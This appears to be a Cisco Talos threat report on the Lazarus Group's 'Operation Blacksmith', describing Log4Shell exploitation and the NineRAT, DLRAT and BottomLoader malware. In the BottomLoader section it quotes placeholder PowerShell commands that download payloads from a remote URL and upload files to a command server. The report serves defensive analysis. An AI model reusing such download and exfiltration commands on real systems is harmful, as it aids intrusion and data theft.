- Cisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation Blacksmith,” employing at least three new DLang-based malware families, two of which are remote access trojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control (C2) communications. We track this Telegram-based RAT as “NineRAT” and the non-Telegram-based RAT as “DLRAT.” We track the DLang-based downloader as “BottomLoader.”
- Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group. Over the past year and a half, Talos has disclosed three different remote access trojans (RATs) built using uncommon technologies in their development, like QtFramework, PowerBasic and, now, DLang.
- Talos has observed an overlap between our findings in this campaign conducted by Lazarus including tactics, techniques and procedures (TTPs) consistent with the North Korean state-sponsored group Onyx Sleet (PLUTIONIUM), also known as the Andariel APT group. Andariel is widely considered to be an APT sub-group under the Lazarus umbrella.
- This campaign consists of continued opportunistic targeting of enterprises globally that publicly host and expose their vulnerable infrastructure to n-day vulnerability exploitation such as CVE-2021-44228 (Log4j). We have observed Lazarus target manufacturing, agricultural and physical security companies.
Lazarus Group’s, Operation Blacksmith compromised manufacturing, agriculture and physical security sectors
Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as Log4Shell, and the use of a previously unknown DLang-based RAT utilizing Telegram as its C2 channel. We’re naming this malware family “NineRAT.” NineRAT was initially built around May 2022 and was first used in this campaign as early as March 2023, almost a year later, against a South American agricultural organization. We then saw NineRAT being used again around September 2023 against a European manufacturing entity.
During our analysis, Talos found some overlap with the malicious attacks disclosed by Microsoft in October 2023 attributing the activity to Onyx Sleet, also known as PLUTIONIUM or Andariel.
Talos agrees with other researchers’ assessment that the Lazarus APT is essentially an umbrella of sub-groups that support different objectives of North Korea in defense, politics, national security and research and development. Each sub-group operates its own campaigns and develops and deploys bespoke malware against their targets, not necessarily working in full coordination. Andariel is typically tasked with initial access, reconnaissance and establishing long-term access for espionage in support of North Korean government interests. In some cases, Andariel has also conducted ransomware attacks against healthcare organizations.
The current campaign, Operation Blacksmith, consists of similarities and overlaps in tooling and tactics observed in previous attacks conducted by the Andariel group within Lazarus.
A common artifact in this campaign was “HazyLoad,” a custom-made proxy tool previously only seen in the Microsoft report. Talos found HazyLoad targeting a European firm and an American subsidiary of a South Korean physical security and surveillance company as early as May 2023.
In addition to Hazyload, we discovered “NineRAT” and two more distinct malware families — both DLang-based — being used by Lazarus. This includes a RAT family we’re calling “DLRAT” and a downloader we call “BottomLoader” meant to download additional payloads such as HazyLoad on an infected endpoint.
The adoption of DLang in Lazarus’ malware — NineRAT, DLRAT and BottomLoader
NineRAT uses Telegram as its C2 channel for accepting commands, communicating their outputs and even for inbound and outbound file transfer. The use of Telegram by Lazarus is likely to evade network and host-based detection measures by employing a legitimate service as a channel of C2 communications.
NineRAT consists of three components, a dropper binary that contains two other components embedded in it. The dropper will write the two components on the disk and delete itself. The first component is an instrumentor, called nsIookup.exe ( capital ‘i’ instead of lower case L) that will execute the second component and will be used in the persistence mechanism. Modular infection chains such as these are frequently used by threat actors to achieve a multitude of objectives from defense evasion to functional separation of components that can be upgraded or modified while avoiding noisy operations on an infected system.
The dropper will set up persistence for the first component using a BAT script. The persistence mechanism accepts a service name, the path to the first component and service creation parameters:
(Note the use of a capital “i” instead of “L” in nslookup[.]exe.)
The instrumentor binary contains a preconfigured path to the NineRAT malware which is used to execute the malware:
Instrumentor binary (first component) containing the path to NineRAT malware on disk.
With NineRAT activated, the malware becomes the primary method of interaction with the infected host. However, previously deployed backdoor mechanisms, such as the reverse proxy tool HazyLoad, remain in place. The multiple tools give overlapping backdoor entries to the Lazarus Group with redundancies in the event a tool is discovered, enabling highly persistent access. In previous intrusions such as the one disclosed by Talos in 2022, Lazarus relied heavily on the use of proxy tools as a means of continued access to issue commands and exfiltrate data.
The Telegram C2 channels used by the malware led to the discovery of a previously public Telegram bot “[at]StudyJ001Bot” that was leveraged by Lazarus in NineRAT. This Bot is publicly illustrated along with its ID and communication URL in a tutorial in Korean language from 2020. Using a publicly accessible bot may lead to infrastructure hijacking and likely having recognized that, Lazarus started using their own Bots for NineRAT. Interestingly, switching over to their own Telegram C2 channels, however, did not deter the use of older NineRAT samples using open channels. Anadriel has continued to use them well into 2023, even though they first started work on NineRAT in 2022. NineRAT typically consists of two API tokens for interacting with two different Telegram channels — one of these tokens is publicly listed.
NineRAT interacts with the Telegram channel using DLang-based libraries implemented to talk to Telegram’s APIs. Initially, the implant tests authentication using the getMe method. The implant can upload documents to Telegram using the sendDocument method/endpoint or download files via the getFile method. The malware can accept the following commands from their operator Telegram:
NineRAT can also uninstall itself from the system using a BAT file.
Below are some of the commands run by NineRAT for reconnaissance:
Pivoting off the NineRAT samples, we discovered two additional malware families written in DLang by Lazarus. One of these is simply a downloader we track as “BottomLoader” meant to download and execute the next stage payload from a remote host such as HazyLoad:
Strings and embedded payload URL in the DLang-based downloader, BottomLoader.
BottomLoader can download the next stage payload from a hardcoded remote URL via a PowerShell command:
powershell Invoke-webrequest -URI <URL> -outfile <file_location_on_system>
It can also upload files to the C2, again using PowerShell:
powershell (New-Object System.Net.WebClient).UploadFile('<file_path>','<remote_url>’)
BottomLoader can also create persistence for newer versions or completely new follow-up payloads by creating a “.URL” file in the Startup directory to run the PowerShell command to download the payload. The URL file is constructed using the following commands:
The other malware is a downloader and RAT, we track as “DLRAT,” which can be used to deploy additional malware and retrieve commands from the C2 and execute them on the infected endpoints:
DLRAT: A DLang-based RAT and downloader.
This malware contains hardcoded commands to perform system reconnaissance. It starts by executing the commands on the endpoint to gather preliminary information about the system: “ver”, “whoami” and “getmac”. With this, the operators will have information about the version of the operating system, which user is running the malware and MAC address that allows them to identify the system on the network.
Once the first initialization and beacon is performed, an initialization file is created, in the same directory, with the name “SynUnst.ini”.
After beaconing to the C2, the RAT will post, in a multipart format, the collected information and hardcoded session information.
During our analysis, we found that the session information ID used by DLRAT as part of its communications with its C2 server is “23wfow02rofw391ng23“, which is the same value that we found during our previous research into MagicRAT. In the case of MagicRAT, the value is encoded as an HTML post. But with DLRAT, it's being posted as multipart/form-data. This session information is hardcoded into the DLRAT malware as a base64-encoded string constructed on the process stack during runtime:
The C2 reply only contains the external IP address of the implant. The malware recognizes the following command codes/names sent by the C2 servers to execute corresponding actions on the infected system:
Illustrating operation Blacksmith
This particular attack observed by Talos involves the successful exploitation of CVE-2021-44228, also known as Log4Shell, on publicly facing VMWare Horizon servers, as a means of initial access to vulnerable public-facing servers. Preliminary reconnaissance follows the initial access leading to the deployment of a custom-made implant on the infected system.
Phase 1: Initial reconnaissance by Lazarus
Lazarus’s initial access begins with successful exploitation of CVE-2021-44228, the infamous Log4j vulnerability discovered in 2021. The vulnerability has been extensively exploited by the Lazarus umbrella of APT groups to deploy several pieces of malware and dual-use tools, and to conduct extensive hands-on-keyboard activity.
Once the initial reconnaissance has been completed, Lazarus’ operators deployed HazyLoad, a proxy tool used to establish direct access to the infected system without having to repeatedly exploit CVE-2021-44228.
In certain instances, the operators will also switch HazyLoad over to a new remote IP address. This is a common tactic attackers use to maintain continued access to previously compromised systems as their infrastructure evolves.
The threat actors also created an additional user account on the system, granting it administrative privileges. Talos documented this TTP earlier this year, but the activity observed previously was meant to create unauthorized user accounts at the domain level. In this campaign, the operators created a local account, which matches the user account documented by Microsoft.
Once the user account was successfully set up, the attackers switched over to it for their hands-on-keyboard activity, which constitutes a deviation from the pattern Cisco Talos previously documented. The hands-on-keyboard activity begins by downloading and using credential dumping utilities such as ProcDump and MimiKatz.
Phase 2: Lazarus deploys NineRAT
Once the credential dumping is complete, Lazarus deploys a previously unknown RAT we’re calling “NineRAT” on the infected systems. NineRAT was first seen being used in the wild by Lazarus as early as March 2023. NineRAT is written in DLang and indicates a definitive shift in TTPs from APT groups falling under the Lazarus umbrella with the increased adoption of malware being authored using non-traditional frameworks such as the Qt framework, including MagicRAT and QuiteRAT.
Once NineRAT is activated, it accepts preliminary commands from the Telegram-based C2 channel, to again fingerprint the infected systems. Re-fingerprinting the infected systems indicates the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase.
Commands typically executed by NineRAT include:
Ways our customers can detect and block this threat are listed below.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
IOCs for this research can also be found at our GitHub repository here.